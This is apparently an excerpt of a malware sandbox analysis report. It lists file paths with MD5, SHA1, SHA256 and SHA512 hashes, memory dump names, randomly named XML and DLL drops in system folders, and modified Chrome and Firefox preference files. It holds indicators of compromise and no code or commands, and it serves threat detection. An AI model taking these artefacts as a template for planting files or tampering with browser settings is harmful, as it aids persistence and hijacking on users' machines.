SHA256 c2dfdf8f5ff443eeecfd4aeb6b42ad28ee13cc9622c4e93ae9407fbbd9d7ff73
SHA512 c1ade34762d6da08d050956b9802bf7aa6b11b9dde00e1be91cbdd1eea7cd7eb2fe0018dad5a37de82ccedc321d8ff5b13754256ae002797cbcdccb895852631

C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml

MD5 89b52cc6ee669b138eb820110393eb92
SHA1 48121b2083e30fbd7a0eafb7081a08526b756cd2
SHA256 b43aa28aba3b6f026c4e6d8cc30d96480817a1e4e88bc9392256ab8c36e1be7c
SHA512 c9844b624d81fdb056bf5baf0c8612bf48c2c4563950ac54ec1fe7890b88d81a526f39af36981014be5bcf30610119f96d566e77bd5f8e50243ab70a25199908

C:\ProgramData\WkkDuRgYrrqHXcVB\oujrFQM.xml

MD5 9202b3349ae74faa4ea1b3e1009bc5dc
SHA1 80b322081177f45aa1f84abc0dc3a7561d22fd02
SHA256 d63fc931812ca463ee1870f7cd0f83f9b3328f0d7d89cf12e983bae2de8bf0a5
SHA512 f93b5391a1367b1e663f9943c1329f6fbcec34aa5f65578abeccbc7818e9510312fe955e57ea8d8c7835e8a8e3d797e8792721c8f9f6d195483661603e4c087f

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml

MD5 be657670fc424d631164cdaec5307ec3
SHA1 b34d0254742c084c8edfc05b110c284f1f6ee0bd
SHA256 e98c068040671595c8029c5e875bdb6ee4e1c2e2eef6cc31d5e656e266e6a723
SHA512 ae242143d869e5aa429448cb19214c6b2b274181b73c074de9b16647da22d98faeab7bc66ec5b04273ff5cb00aa20af0ccdfaec16621027b5040460200837e83

C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml

MD5 7226f7b24299baede1fdb4377c0d0d61
SHA1 25b26810341676489011ce02d72cad856398e0a1
SHA256 52214b332d343a36d2bf78fd47d90244d156afe8cb675c36e13d1564e9ec71c7
SHA512 8b7719b801f183224057d905ff8743b18b373f11b665d43c1975b7ca2e4f5b43ddf9a0263836e471f720c27b26d5a2745ceba6a379c3aef3244b921f023f4871

C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/2468-488-0x00000000039E0000-0x0000000003A6A000-memory.dmp

memory/460-497-0x0000000001F40000-0x0000000002528000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 08c35332b1f1fd8f98c0d3449f7a1743
SHA1 936e0ebab321566f90e9dd9db43aeaafad96b6a0
SHA256 5097d8378d91458194d6aa8d87dc6ea1c9bdaf1b89da0753e7e38fb51a8602b1
SHA512 ee6afe740304f114bc423213eec864f4ac83a13ae97eea48593bed149faefc8124170644745a4bbdc1f7b207d9e7d11c125df8b28c60c2c17a0542673cb3f921

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\obahtjhr.default-release\prefs.js

MD5 73b50aaf2d3d408e64d5864b3bb227a7
SHA1 7a548292b5461985ea8b9eb8710469d775ed7fb9
SHA256 bc108b685b08caa7fe26279fb4acc47066fe9dc88a621a148cc128615b3f1b6c
SHA512 a19377cc1e6820865c2bad4379e585bcbd6af16383088474bab512e6f3cb6c79540dc2a325349937c84a99101c0894e93ae53fcff774c2e7c5dc11d80af36396

memory/2468-506-0x0000000003A70000-0x0000000003B45000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0d5a9616622f25fefc237d0cbde1d7bb
SHA1 c0a4a9a6d672f6b7a20453b109194052f48172ee
SHA256 c413889bd97d872713fc5546659234383a98a1436708dcafed8d46aadd565d19
SHA512 5766758e36af271a425d49b705f138a5f11b94584c7086c733ce2690c852bf4701c7c8fc2809de08b694af96acd7b0dad7c34159c72afef7c5b48cd16fa3a541